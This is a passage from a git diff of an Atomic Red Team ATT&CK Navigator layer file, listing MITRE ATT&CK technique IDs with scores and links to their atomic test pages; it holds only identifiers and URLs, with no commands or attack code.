"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1078.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1095","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1106","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1112","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1114.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1114","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1115","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"},{"techniqueID":"T1119","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"},{"techniqueID":"T1120","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"},{"techniqueID":"T1123","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"},{"techniqueID":"T1124","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"},{"techniqueID":"T1127.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1127","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1133","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"},{"techniqueID":"T1134.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1137.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"},{"techniqueID":"T1140","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1197","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1202","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"},{"techniqueID":"T1204.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1204","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1207","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"},{"techniqueID":"T1216.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1218.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"},{"techniqueID":"T1219","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"},{"techniqueID":"T1220","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"},{"techniqueID":"T1221","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"},{"techniqueID":"T1222.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1482","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1489","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"},{"techniqueID":"T1490","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"},{"techniqueID":"T1491.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1491","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1505.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1531","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"},{"techniqueID":"T1543.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1546.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546.013","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1547.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1548.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1550.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1555.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"},{"techniqueID":"T1556.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1556","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1558.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1559.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1559","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1563.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1563","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"},{"techniqueID":"T1566.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1566","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1569.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1573","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"},{"techniqueID":"T1574.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json index e607a440..1530a1d7 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json @@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one 